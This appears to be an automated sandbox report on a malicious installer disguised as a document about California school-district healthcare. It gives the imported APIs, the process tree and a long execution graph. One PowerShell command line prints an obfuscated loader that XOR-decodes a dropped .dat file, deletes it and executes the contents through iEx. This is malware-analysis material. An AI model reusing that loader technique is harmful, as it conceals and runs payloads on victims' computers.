                                                                                                      kernel32.dllGetACP, GetExitCodeProcess, LocalFree, CloseHandle, SizeofResource, VirtualProtect, VirtualFree, GetFullPathNameW, ExitProcess, HeapAlloc, GetCPInfoExW, RtlUnwind, GetCPInfo, GetStdHandle, GetModuleHandleW, FreeLibrary, HeapDestroy, ReadFile, CreateProcessW, GetLastError, GetModuleFileNameW, SetLastError, FindResourceW, CreateThread, CompareStringW, LoadLibraryA, ResetEvent, GetVersion, RaiseException, FormatMessageW, SwitchToThread, GetExitCodeThread, GetCurrentThread, LoadLibraryExW, LockResource, GetCurrentThreadId, UnhandledExceptionFilter, VirtualQuery, VirtualQueryEx, Sleep, EnterCriticalSection, SetFilePointer, LoadResource, SuspendThread, GetTickCount, GetFileSize, GetStartupInfoW, GetFileAttributesW, InitializeCriticalSection, GetSystemWindowsDirectoryW, GetThreadPriority, SetThreadPriority, GetCurrentProcess, VirtualAlloc, GetSystemInfo, GetCommandLineW, LeaveCriticalSection, GetProcAddress, ResumeThread, GetVersionExW, VerifyVersionInfoW, HeapCreate, GetWindowsDirectoryW, VerSetConditionMask, GetDiskFreeSpaceW, FindFirstFileW, GetUserDefaultUILanguage, lstrlenW, QueryPerformanceCounter, SetEndOfFile, HeapFree, WideCharToMultiByte, FindClose, MultiByteToWideChar, LoadLibraryW, SetEvent, CreateFileW, GetLocaleInfoW, GetSystemDirectoryW, DeleteFileW, GetLocalTime, GetEnvironmentVariableW, WaitForSingleObject, WriteFile, ExitThread, DeleteCriticalSection, TlsGetValue, GetDateFormatW, SetErrorMode, IsValidLocale, TlsSetValue, CreateDirectoryW, GetSystemDefaultUILanguage, EnumCalendarInfoW, LocalAlloc, GetUserDefaultLangID, RemoveDirectoryW, CreateEventW, SetThreadLocale, GetThreadLocale
                                                                                                      comctl32.dllInitCommonControls
                                                                                                      version.dllGetFileVersionInfoSizeW, VerQueryValueW, GetFileVersionInfoW
                                                                                                      user32.dllCreateWindowExW, TranslateMessage, CharLowerBuffW, CallWindowProcW, CharUpperW, PeekMessageW, GetSystemMetrics, SetWindowLongW, MessageBoxW, DestroyWindow, CharUpperBuffW, CharNextW, MsgWaitForMultipleObjects, LoadStringW, ExitWindowsEx, DispatchMessageW
                                                                                                      oleaut32.dllSysAllocStringLen, SafeArrayPtrOfIndex, VariantCopy, SafeArrayGetLBound, SafeArrayGetUBound, VariantInit, VariantClear, SysFreeString, SysReAllocStringLen, VariantChangeType, SafeArrayCreate
                                                                                                      netapi32.dllNetWkstaGetInfo, NetApiBufferFree
                                                                                                      advapi32.dllConvertStringSecurityDescriptorToSecurityDescriptorW, RegQueryValueExW, AdjustTokenPrivileges, GetTokenInformation, ConvertSidToStringSidW, LookupPrivilegeValueW, RegCloseKey, OpenProcessToken, RegOpenKeyExW
                                                                                                      NameOrdinalAddress
                                                                                                      TMethodImplementationIntercept30x4541a8
                                                                                                      __dbk_fcall_wrapper20x40d0a0
                                                                                                      dbkFCallWrapperAddr10x4be63c
                                                                                                      Language of compilation systemCountry where language is spokenMap
                                                                                                      EnglishUnited States
                                                                                                      No network behavior found

                                                                                                      Click to jump to process

                                                                                                      Click to jump to process

                                                                                                      Click to dive into process behavior distribution

                                                                                                      Click to jump to process

                                                                                                      Target ID:0
                                                                                                      Start time:13:53:29
                                                                                                      Start date:13/11/2024
                                                                                                      Path:C:\Users\user\Desktop\Must-School-Districts-In-California-Offer-Free-Healthcare-For-Employees.exe
                                                                                                      Wow64 process (32bit):true
                                                                                                      Commandline:"C:\Users\user\Desktop\Must-School-Districts-In-California-Offer-Free-Healthcare-For-Employees.exe"
                                                                                                      Imagebase:0x400000
                                                                                                      File size:321'527'232 bytes
                                                                                                      MD5 hash:988955BFA46336BE7EB44F11F5427699
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:Borland Delphi
                                                                                                      Reputation:low
                                                                                                      Has exited:true

                                                                                                      Target ID:5
                                                                                                      Start time:13:53:29
                                                                                                      Start date:13/11/2024
                                                                                                      Path:C:\Users\user\AppData\Local\Temp\is-35JO9.tmp\Must-School-Districts-In-California-Offer-Free-Healthcare-For-Employees.tmp
                                                                                                      Wow64 process (32bit):true
                                                                                                      Commandline:"C:\Users\user~1\AppData\Local\Temp\is-35JO9.tmp\Must-School-Districts-In-California-Offer-Free-Healthcare-For-Employees.tmp" /SL5="$2042A,320672528,821248,C:\Users\user\Desktop\Must-School-Districts-In-California-Offer-Free-Healthcare-For-Employees.exe"
                                                                                                      Imagebase:0x7ff75da10000
                                                                                                      File size:3'157'504 bytes
                                                                                                      MD5 hash:F386E39F745DF29C2619F21BCA6DAEB7
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:Borland Delphi
                                                                                                      Antivirus matches:
                                                                                                      • Detection: 5%, ReversingLabs
                                                                                                      Reputation:low
                                                                                                      Has exited:true

                                                                                                      Target ID:8
                                                                                                      Start time:13:53:30
                                                                                                      Start date:13/11/2024
                                                                                                      Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                      Wow64 process (32bit):
                                                                                                      Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -COmMAnD "iEx([tEXT.enCODINg]::UTF8.gETsTriNg((({$F=[Io.FIlE]::ReADALLByTeS($ArGS[0]);(RM $argS[0]);ReTURn $f}.InVoKE('c:\uSERS\user~1\apPdatA\LoCaL\tEmP\Is-39DMu.TMp\..\26E22c944A289b4cDd81b4EA83E051ad.daT'))|%{$_ -BxOr 'yXAwMfFaZxzDOHKgIEqrlQjtoJuBNSWc'[$K++%32]})))"
                                                                                                      Imagebase:
                                                                                                      File size:433'152 bytes
                                                                                                      MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                                      Has elevated privileges:
                                                                                                      Has administrator privileges:
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Reputation:high
                                                                                                      Has exited:false

                                                                                                      Target ID:9
                                                                                                      Start time:13:53:30
                                                                                                      Start date:13/11/2024
                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                      Wow64 process (32bit):false
                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                      Imagebase:0x7ff75da10000
                                                                                                      File size:862'208 bytes
                                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Reputation:high
                                                                                                      Has exited:false

                                                                                                      Target ID:10
                                                                                                      Start time:13:53:31
                                                                                                      Start date:13/11/2024
                                                                                                      Path:C:\Users\user\AppData\Local\Temp\is-39DMU.tmp\PhotoshopElements_2024_LS30_win64.exe
                                                                                                      Wow64 process (32bit):true
                                                                                                      Commandline:"C:\Users\user~1\AppData\Local\Temp\is-39DMU.tmp\PhotoshopElements_2024_LS30_win64.exe"
                                                                                                      Imagebase:0x1d0000
                                                                                                      File size:4'616'696 bytes
                                                                                                      MD5 hash:43843D75A5EEAD8EE3B71EE2ADCBA3FE
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Antivirus matches:
                                                                                                      • Detection: 3%, ReversingLabs
                                                                                                      Reputation:low
                                                                                                      Has exited:false

                                                                                                      Target ID:14
                                                                                                      Start time:13:53:35
                                                                                                      Start date:13/11/2024
                                                                                                      Path:C:\Windows\System32\svchost.exe
                                                                                                      Wow64 process (32bit):false
                                                                                                      Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                                                                                                      Imagebase:0x7ff7b4ee0000
                                                                                                      File size:55'320 bytes
                                                                                                      MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Reputation:high
                                                                                                      Has exited:false

                                                                                                      Target ID:15
                                                                                                      Start time:13:53:36
                                                                                                      Start date:13/11/2024
                                                                                                      Path:C:\Users\user\AppData\Local\Temp\is-39DMU.tmp\PhotoshopElements_2024_LS30_win64.exe
                                                                                                      Wow64 process (32bit):true
                                                                                                      Commandline:"C:\Users\user~1\AppData\Local\Temp\is-39DMU.tmp\PhotoshopElements_2024_LS30_win64.exe" --pipename={6701CC87-BE79-4714-84C1-CDD879D9C7E0} --edtWorkFlow=1
                                                                                                      Imagebase:0x1d0000
                                                                                                      File size:4'616'696 bytes
                                                                                                      MD5 hash:43843D75A5EEAD8EE3B71EE2ADCBA3FE
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Reputation:low
                                                                                                      Has exited:false

                                                                                                      Target ID:17
                                                                                                      Start time:13:53:45
                                                                                                      Start date:13/11/2024
                                                                                                      Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                      Wow64 process (32bit):false
                                                                                                      Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://ims-na1.adobelogin.com/ims/authorize?client_id=CC_HD_ESD_WEB&scope=allow_ac_dt_exchange%2Copenid%2CAdobeID%2Ccreative_cloud%2Ccreative_sdk%2Cread_organizations%2Csao.cce_private%2Cadditional_info.account_type&locale=en_US&redirect_uri=https%3A%2F%2Fauth.services.adobe.com%2Fen_US%2Fdeeplink.html%3Fdelegated_request_id%3D8b59eed4-a4c2-4d7f-a8ea-ab95b58f0a24%26client_id%3DCC_HD_ESD_WEB%26deeplink%3Ddelegation
                                                                                                      Imagebase:0x7ff6c4390000
                                                                                                      File size:3'242'272 bytes
                                                                                                      MD5 hash:5BBFA6CBDF4C254EB368D534F9E23C92
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Reputation:high
                                                                                                      Has exited:false

                                                                                                      Target ID:18
                                                                                                      Start time:13:53:46
                                                                                                      Start date:13/11/2024
                                                                                                      Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                      Wow64 process (32bit):false
                                                                                                      Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2156 --field-trial-handle=1916,i,13664864779448031188,2924605641930340072,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                                                                                                      Imagebase:0x7ff6c4390000
                                                                                                      File size:3'242'272 bytes
                                                                                                      MD5 hash:5BBFA6CBDF4C254EB368D534F9E23C92
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Reputation:high
                                                                                                      Has exited:false

                                                                                                      Target ID:19
                                                                                                      Start time:15:23:29
                                                                                                      Start date:13/11/2024
                                                                                                      Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                      Wow64 process (32bit):false
                                                                                                      Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=4124 --field-trial-handle=1916,i,13664864779448031188,2924605641930340072,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                                                                                                      Imagebase:0x7ff6c4390000
                                                                                                      File size:3'242'272 bytes
                                                                                                      MD5 hash:5BBFA6CBDF4C254EB368D534F9E23C92
                                                                                                      Has elevated privileges:false
                                                                                                      Has administrator privileges:false
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Reputation:high
                                                                                                      Has exited:false

                                                                                                      Target ID:20
                                                                                                      Start time:15:23:29
                                                                                                      Start date:13/11/2024
                                                                                                      Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                      Wow64 process (32bit):false
                                                                                                      Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5524 --field-trial-handle=1916,i,13664864779448031188,2924605641930340072,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                                                                                                      Imagebase:0x7ff6c4390000
                                                                                                      File size:3'242'272 bytes
                                                                                                      MD5 hash:5BBFA6CBDF4C254EB368D534F9E23C92
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Has exited:true

                                                                                                      Reset < >

                                                                                                        Execution Graph

                                                                                                        Execution Coverage:5.4%
                                                                                                        Dynamic/Decrypted Code Coverage:0%
                                                                                                        Signature Coverage:9.5%
                                                                                                        Total number of Nodes:2000
                                                                                                        Total number of Limit Nodes:46
                                                                                                        execution_graph 20028 401f10 CoInitialize 20048 401f46 20028->20048 20029 401f67 RtlEnterCriticalSection RtlLeaveCriticalSection 20032 401fc2 RtlEnterCriticalSection RtlLeaveCriticalSection 20029->20032 20029->20048 20030 401f4e RtlEnterCriticalSection RtlLeaveCriticalSection 20030->20029 20031 4022cd CoUninitialize 20030->20031 20035 510a46 _ValidateLocalCookies IsProcessorFeaturePresent 20031->20035 20032->20048 20038 402312 20035->20038 20036 402380 4 API calls 20039 4021ce RtlEnterCriticalSection RtlLeaveCriticalSection 20036->20039 20039->20048 20041 40203a RtlEnterCriticalSection 20042 402129 RtlLeaveCriticalSection 20041->20042 20041->20048 20042->20048 20043 402440 96 API calls 20043->20048 20044 2dadf0 23 API calls 20044->20048 20045 402318 20077 5008dc 20045->20077 20048->20029 20048->20030 20048->20036 20048->20042 20048->20043 20048->20044 20048->20045 20049 234910 7 API calls 20048->20049 20050 3f9300 12 API calls 20048->20050 20052 402380 RtlEnterCriticalSection 20048->20052 20057 402440 20048->20057 20066 3f0dd0 20048->20066 20071 286360 20048->20071 20049->20048 20050->20048 20053 402398 20052->20053 20054 4023eb RtlLeaveCriticalSection 20052->20054 20055 4023d6 RtlLeaveCriticalSection 20053->20055 20056 4023bd RtlLeaveCriticalSection 20053->20056 20054->20048 20055->20048 20056->20048 20058 402508 20057->20058 20059 40246e 20057->20059 20060 20b670 2 API calls 20058->20060 20085 274120 20059->20085 20061 40250d 20060->20061 20061->20041 20063 4024a0 std::locale::_Locimp::_Locimp 20100 2e1930 20063->20100 20065 4024fc 20065->20041 20067 3f0e53 WaitForSingleObject 20066->20067 20070 3f0dde 20066->20070 20068 3f0e7c ResetEvent 20067->20068 20069 3f0e73 20067->20069 20068->20048 20069->20068 20070->20048 20072 286374 20071->20072 20074 286387 20071->20074 20072->20074 20363 287fc0 20072->20363 20073 2863b9 20073->20048 20074->20073 20076 510a59 std::_Facet_Register 16 API calls 20074->20076 20076->20073 20078 5008ea 20077->20078 20079 51307e Concurrency::cancel_current_task KiUserExceptionDispatcher 20078->20079 20080 5008f8 20079->20080 20526 274180 20080->20526 20083 51307e Concurrency::cancel_current_task KiUserExceptionDispatcher 20084 500918 20083->20084 20086 274171 20085->20086 20087 27412d 20085->20087 20088 209490 Concurrency::cancel_current_task KiUserExceptionDispatcher 20086->20088 20089 274137 20087->20089 20090 27415a 20087->20090 20097 274144 20088->20097 20089->20086 20091 27413e 20089->20091 20092 27416b 20090->20092 20095 510a59 std::_Facet_Register 16 API calls 20090->20095 20094 510a59 std::_Facet_Register 16 API calls 20091->20094 20092->20063 20093 5215e8 7 API calls 20096 27417b 20093->20096 20094->20097 20098 274164 20095->20098 20097->20093 20099 27414d 20097->20099 20098->20063 20099->20063 20101 2e193c 20100->20101 20102 2e195c std::ios_base::_Ios_base_dtor 20100->20102 20101->20102 20103 5215e8 7 API calls 20101->20103 20102->20065 20104 2e1989 20103->20104 20135 2e1660 20104->20135 20106 2e1a1e 20107 2e1660 96 API calls 20106->20107 20108 2e1a32 20107->20108 20112 2e1bce 20108->20112 20116 2e1a7d 20108->20116 20132 2e1a9a 20108->20132 20150 2b93b0 20108->20150 20109 2e19de 20109->20106 20110 2e1aa3 20109->20110 20111 2b93b0 23 API calls 20110->20111 20113 2e1ac2 20110->20113 20111->20113 20202 2b20a0 20112->20202 20114 2e26f0 96 API calls 20113->20114 20115 2e1ae0 20113->20115 20114->20115 20117 2b20a0 95 API calls 20115->20117 20116->20132 20162 2e26f0 20116->20162 20121 2e1c49 20117->20121 20119 2e1bd4 20126 2e1c0f 20119->20126 20128 2b93b0 23 API calls 20119->20128 20125 234910 7 API calls 20121->20125 20122 2e1c39 20209 234910 20122->20209 20127 2e1c51 20125->20127 20126->20112 20130 2e26f0 96 API calls 20126->20130 20129 510a46 _ValidateLocalCookies IsProcessorFeaturePresent 20127->20129 20128->20126 20131 2e1c6b 20129->20131 20130->20112 20131->20065 20132->20112 20132->20119 20133 2b93b0 23 API calls 20132->20133 20134 2e26f0 96 API calls 20132->20134 20133->20132 20134->20132 20217 2dadf0 20135->20217 20137 2e16ab 20138 2e172f 20137->20138 20139 2e16e5 20137->20139 20142 2e16eb std::locale::_Locimp::_Locimp 20137->20142 20141 20b670 2 API calls 20138->20141 20225 2e18d0 20139->20225 20143 2e1734 20141->20143 20142->20109 20144 20ad10 7 API calls 20143->20144 20145 2e179d 20144->20145 20146 20ad10 7 API calls 20145->20146 20147 2e17e2 20146->20147 20148 510a46 _ValidateLocalCookies IsProcessorFeaturePresent 20147->20148 20149 2e17f4 20148->20149 20149->20109 20151 2b93e9 20150->20151 20154 2b9490 std::locale::_Locimp::_Locimp 20150->20154 20152 2b94f0 20151->20152 20156 2b93f5 20151->20156 20153 20b670 2 API calls 20152->20153 20155 2b94f5 20153->20155 20154->20116 20157 5215e8 7 API calls 20155->20157 20156->20155 20158 2b9438 std::ios_base::_Ios_base_dtor 20156->20158 20160 2b94fa 20157->20160 20159 274120 23 API calls 20158->20159 20161 2b945e std::locale::_Locimp::_Locimp 20159->20161 20161->20116 20163 2e2729 20162->20163 20168 2e27d0 std::locale::_Locimp::_Locimp 20162->20168 20164 2e2735 20163->20164 20165 2e2830 20163->20165 20166 2e2835 20164->20166 20172 2e2778 std::ios_base::_Ios_base_dtor 20164->20172 20165->20166 20167 20b670 2 API calls 20165->20167 20169 5215e8 7 API calls 20166->20169 20167->20166 20168->20132 20171 2e283a 20169->20171 20170 2e18d0 96 API calls 20173 2e279e std::locale::_Locimp::_Locimp 20170->20173 20174 2e2948 20171->20174 20179 2e286f 20171->20179 20172->20170 20173->20132 20290 2e36f0 20174->20290 20176 2e294f 20177 2e2967 20176->20177 20178 2e2953 20176->20178 20182 2e29d4 20177->20182 20299 2e5370 20177->20299 20181 2e2c60 25 API calls 20178->20181 20180 2e287e 20179->20180 20191 2e289a 20179->20191 20180->20182 20183 2e288a 20180->20183 20185 2e2960 20181->20185 20310 2e0490 20182->20310 20273 2e2c60 20183->20273 20185->20132 20187 2e29db 20190 2e0490 2 API calls 20187->20190 20193 2e29e2 20190->20193 20191->20187 20194 2e28dd 20191->20194 20196 510a59 std::_Facet_Register 16 API calls 20194->20196 20195 2e299b 20303 2e3a50 20195->20303 20198 2e28e4 20196->20198 20198->20132 20199 2e29a3 20306 2e4c80 20199->20306 20201 2e29c6 20201->20132 20203 2b20a9 20202->20203 20204 2b20c9 std::ios_base::_Ios_base_dtor 20202->20204 20203->20204 20205 5215e8 7 API calls 20203->20205 20204->20122 20206 2b20f0 20205->20206 20339 2b74f0 20206->20339 20208 2b210e 20208->20122 20210 234919 20209->20210 20211 234939 std::ios_base::_Ios_base_dtor 20209->20211 20210->20211 20212 5215e8 7 API calls 20210->20212 20211->20115 20215 234960 std::ios_base::_Ios_base_dtor 20212->20215 20214 20a680 7 API calls 20214->20215 20215->20214 20216 2349a8 std::ios_base::_Ios_base_dtor 20215->20216 20358 235400 20215->20358 20216->20115 20218 2dae1e 20217->20218 20219 2dae2d std::locale::_Locimp::_Locimp 20217->20219 20220 2dae26 20218->20220 20221 2dae63 20218->20221 20219->20137 20222 274120 23 API calls 20220->20222 20223 20b670 2 API calls 20221->20223 20222->20219 20224 2dae68 20223->20224 20224->20137 20226 2e18dd 20225->20226 20227 2e1921 20225->20227 20228 2e190a 20226->20228 20229 2e18e7 20226->20229 20230 209490 Concurrency::cancel_current_task KiUserExceptionDispatcher 20227->20230 20232 2e191b 20228->20232 20236 510a59 std::_Facet_Register 16 API calls 20228->20236 20229->20227 20231 2e18ee 20229->20231 20233 2e18f4 20230->20233 20235 510a59 std::_Facet_Register 16 API calls 20231->20235 20232->20142 20234 5215e8 7 API calls 20233->20234 20238 2e18fd 20233->20238 20239 2e192b 20234->20239 20235->20233 20237 2e1914 20236->20237 20237->20142 20238->20142 20240 2e195c std::ios_base::_Ios_base_dtor 20239->20240 20241 5215e8 7 API calls 20239->20241 20240->20142 20242 2e1989 20241->20242 20243 2e1660 96 API calls 20242->20243 20246 2e19de 20243->20246 20244 2e1a1e 20245 2e1660 96 API calls 20244->20245 20249 2e1a32 20245->20249 20246->20244 20247 2e1aa3 20246->20247 20248 2e1ac2 20247->20248 20250 2b93b0 23 API calls 20247->20250 20251 2e1ae0 20248->20251 20253 2e26f0 96 API calls 20248->20253 20252 2e1bce 20249->20252 20254 2e1a7d 20249->20254 20256 2b93b0 23 API calls 20249->20256 20271 2e1a9a 20249->20271 20250->20248 20255 2b20a0 95 API calls 20251->20255 20258 2b20a0 95 API calls 20252->20258 20253->20251 20262 2e26f0 96 API calls 20254->20262 20254->20271 20259 2e1c49 20255->20259 20256->20254 20257 2e1bd4 20265 2e1c0f 20257->20265 20267 2b93b0 23 API calls 20257->20267 20261 2e1c39 20258->20261 20264 234910 7 API calls 20259->20264 20260 2b93b0 23 API calls 20260->20271 20263 234910 7 API calls 20261->20263 20262->20271 20263->20251 20266 2e1c51 20264->20266 20265->20252 20269 2e26f0 96 API calls 20265->20269 20268 510a46 _ValidateLocalCookies IsProcessorFeaturePresent 20266->20268 20267->20265 20270 2e1c6b 20268->20270 20269->20252 20270->20142 20271->20252 20271->20257 20271->20260 20272 2e26f0 96 API calls 20271->20272 20272->20271 20274 2e2c82 20273->20274 20275 510a59 std::_Facet_Register 16 API calls 20274->20275 20276 2e2c8f 20274->20276 20275->20276 20278 2e2d08 20276->20278 20280 2e2d4a 20276->20280 20281 2e2d65 20276->20281 20277 2e2d99 20279 510a46 _ValidateLocalCookies IsProcessorFeaturePresent 20277->20279 20278->20277 20313 52d043 20278->20313 20283 2e2893 20279->20283 20284 20ad10 7 API calls 20280->20284 20285 20ad10 7 API calls 20281->20285 20283->20132 20284->20278 20285->20278 20287 2e2dc6 20326 5008bf 20287->20326 20291 2e3868 20290->20291 20297 2e36fe 20290->20297 20292 2e0490 2 API calls 20291->20292 20293 2e386f 20292->20293 20294 2e0490 2 API calls 20293->20294 20293->20297 20294->20297 20295 2e0490 2 API calls 20296 2e387d 20295->20296 20297->20295 20298 2e3744 20297->20298 20298->20176 20302 2e5397 20299->20302 20300 510a46 _ValidateLocalCookies IsProcessorFeaturePresent 20301 2e2990 20300->20301 20301->20182 20301->20195 20302->20300 20304 510a59 std::_Facet_Register 16 API calls 20303->20304 20305 2e3a5f std::locale::_Setgloballocale 20304->20305 20305->20199 20307 2e4ca0 20306->20307 20308 2e4d26 20307->20308 20309 510a59 std::_Facet_Register 16 API calls 20307->20309 20308->20201 20309->20307 20330 500959 20310->20330 20314 538f2f 20313->20314 20315 538f47 20314->20315 20316 538f3c 20314->20316 20318 538f4f 20315->20318 20324 538f58 __dosmaperr 20315->20324 20317 535db3 std::_Locinfo::_Locinfo_ctor 15 API calls 20316->20317 20322 2e2d92 20317->20322 20319 535d79 _free 14 API calls 20318->20319 20319->20322 20320 538f82 RtlReAllocateHeap 20320->20322 20320->20324 20321 538f5d 20323 528e21 _free 14 API calls 20321->20323 20322->20277 20322->20287 20323->20322 20324->20320 20324->20321 20325 533080 std::_Facet_Register 2 API calls 20324->20325 20325->20324 20327 5008cd Concurrency::cancel_current_task 20326->20327 20328 51307e Concurrency::cancel_current_task KiUserExceptionDispatcher 20327->20328 20329 5008db 20328->20329 20335 500777 20330->20335 20333 51307e Concurrency::cancel_current_task KiUserExceptionDispatcher 20334 500978 20333->20334 20336 50078b std::regex_error::regex_error 20335->20336 20337 209390 std::invalid_argument::invalid_argument IsProcessorFeaturePresent 20336->20337 20338 500794 20337->20338 20338->20333 20340 5009cc std::_Lockit::_Lockit 7 API calls 20339->20340 20341 2b752b 20340->20341 20342 5009cc std::_Lockit::_Lockit 7 API calls 20341->20342 20348 2b756d 20341->20348 20343 2b754d 20342->20343 20347 500a24 std::_Lockit::~_Lockit 2 API calls 20343->20347 20344 2b75b5 20345 500a24 std::_Lockit::~_Lockit 2 API calls 20344->20345 20346 2b762a 20345->20346 20349 510a46 _ValidateLocalCookies IsProcessorFeaturePresent 20346->20349 20347->20348 20348->20344 20350 510a59 std::_Facet_Register 16 API calls 20348->20350 20351 2b7644 20349->20351 20352 2b75c0 20350->20352 20351->20208 20353 20eff0 94 API calls 20352->20353 20354 2b75f0 20353->20354 20355 20f0a0 92 API calls 20354->20355 20356 2b7605 20355->20356 20357 500d34 std::_Facet_Register 16 API calls 20356->20357 20357->20344 20359 235443 20358->20359 20362 235417 std::ios_base::_Ios_base_dtor 20358->20362 20359->20215 20360 235400 7 API calls 20360->20362 20361 20a680 7 API calls 20361->20362 20362->20359 20362->20360 20362->20361 20364 287fe0 20363->20364 20365 288001 20364->20365 20366 288151 20364->20366 20367 28815b 20365->20367 20369 28801f 20365->20369 20370 288046 20365->20370 20397 20ea20 20366->20397 20371 209490 Concurrency::cancel_current_task KiUserExceptionDispatcher 20367->20371 20369->20367 20374 510a59 std::_Facet_Register 16 API calls 20369->20374 20375 510a59 std::_Facet_Register 16 API calls 20370->20375 20382 288030 std::locale::_Locimp::_Locimp std::locale::_Setgloballocale 20370->20382 20373 288160 20371->20373 20372 5215e8 7 API calls 20372->20367 20376 2881c8 20373->20376 20377 2881dd 20373->20377 20374->20382 20375->20382 20408 2898a0 20376->20408 20424 241410 20377->20424 20380 510a46 _ValidateLocalCookies IsProcessorFeaturePresent 20381 288e8a 20380->20381 20381->20074 20382->20372 20385 288136 std::ios_base::_Ios_base_dtor 20382->20385 20383 2881fb 20478 210a70 20383->20478 20385->20074 20386 288260 20389 28863f 20386->20389 20390 28868f 20386->20390 20499 286a30 20386->20499 20387 20ad10 7 API calls 20387->20390 20389->20387 20395 28882c 20390->20395 20514 52a2a6 20390->20514 20391 52a2a6 66 API calls 20391->20395 20392 20ad10 7 API calls 20393 2881d5 20392->20393 20393->20380 20395->20391 20396 288a9e 20395->20396 20396->20392 20398 500919 2 API calls 20397->20398 20399 20ea2a 20398->20399 20400 20eb4a 20399->20400 20401 20ea7d 20399->20401 20402 20b670 2 API calls 20400->20402 20404 20baa0 23 API calls 20401->20404 20403 20eb4f 20402->20403 20403->20382 20405 20eaba 20404->20405 20519 20e0c0 20405->20519 20407 20eb3f 20407->20382 20409 2898fa 20408->20409 20410 241410 95 API calls 20409->20410 20411 28990a 20410->20411 20412 210a70 96 API calls 20411->20412 20417 289961 20412->20417 20413 20ad10 7 API calls 20416 289f2e 20413->20416 20414 289ed9 20414->20413 20415 52a2a6 66 API calls 20423 28a0e4 20415->20423 20416->20415 20416->20423 20417->20414 20417->20416 20420 286a30 75 API calls 20417->20420 20418 20ad10 7 API calls 20419 28a722 20418->20419 20421 510a46 _ValidateLocalCookies IsProcessorFeaturePresent 20419->20421 20420->20417 20422 28a73c 20421->20422 20422->20393 20423->20418 20425 5009cc std::_Lockit::_Lockit 7 API calls 20424->20425 20426 241454 20425->20426 20427 5009cc std::_Lockit::_Lockit 7 API calls 20426->20427 20433 241496 20426->20433 20428 241476 20427->20428 20431 500a24 std::_Lockit::~_Lockit 2 API calls 20428->20431 20429 2414eb 20430 500a24 std::_Lockit::~_Lockit 2 API calls 20429->20430 20432 24163b 20430->20432 20431->20433 20434 510a46 _ValidateLocalCookies IsProcessorFeaturePresent 20432->20434 20433->20429 20435 510a59 std::_Facet_Register 16 API calls 20433->20435 20436 241654 20434->20436 20437 2414f9 20435->20437 20436->20383 20438 20eff0 94 API calls 20437->20438 20439 241534 20438->20439 20440 52a2a6 66 API calls 20439->20440 20441 241556 20440->20441 20442 50127a 66 API calls 20441->20442 20443 24155f 20442->20443 20444 50127a 66 API calls 20443->20444 20445 241587 __Getctype 20444->20445 20446 241658 20445->20446 20447 24159b __Getctype 20445->20447 20448 5008bf Concurrency::cancel_current_task KiUserExceptionDispatcher 20446->20448 20449 24165d 20447->20449 20450 2415b7 __Getctype 20447->20450 20448->20449 20451 5008bf Concurrency::cancel_current_task KiUserExceptionDispatcher 20449->20451 20452 241662 20450->20452 20454 2415e1 20450->20454 20451->20452 20453 5008bf Concurrency::cancel_current_task KiUserExceptionDispatcher 20452->20453 20455 241667 20453->20455 20457 20f0a0 92 API calls 20454->20457 20456 52a2a6 66 API calls 20455->20456 20458 24169f 20456->20458 20459 241608 20457->20459 20460 50127a 66 API calls 20458->20460 20461 500d34 std::_Facet_Register 16 API calls 20459->20461 20462 2416ad 20460->20462 20461->20429 20463 50127a 66 API calls 20462->20463 20464 2416e6 __Getctype 20463->20464 20465 5008bf Concurrency::cancel_current_task KiUserExceptionDispatcher 20464->20465 20466 241712 __Getctype std::locale::_Locimp::_Locimp 20464->20466 20465->20466 20467 5008bf Concurrency::cancel_current_task KiUserExceptionDispatcher 20466->20467 20468 241739 __Getctype 20466->20468 20467->20468 20469 5008bf Concurrency::cancel_current_task KiUserExceptionDispatcher 20468->20469 20472 24175f 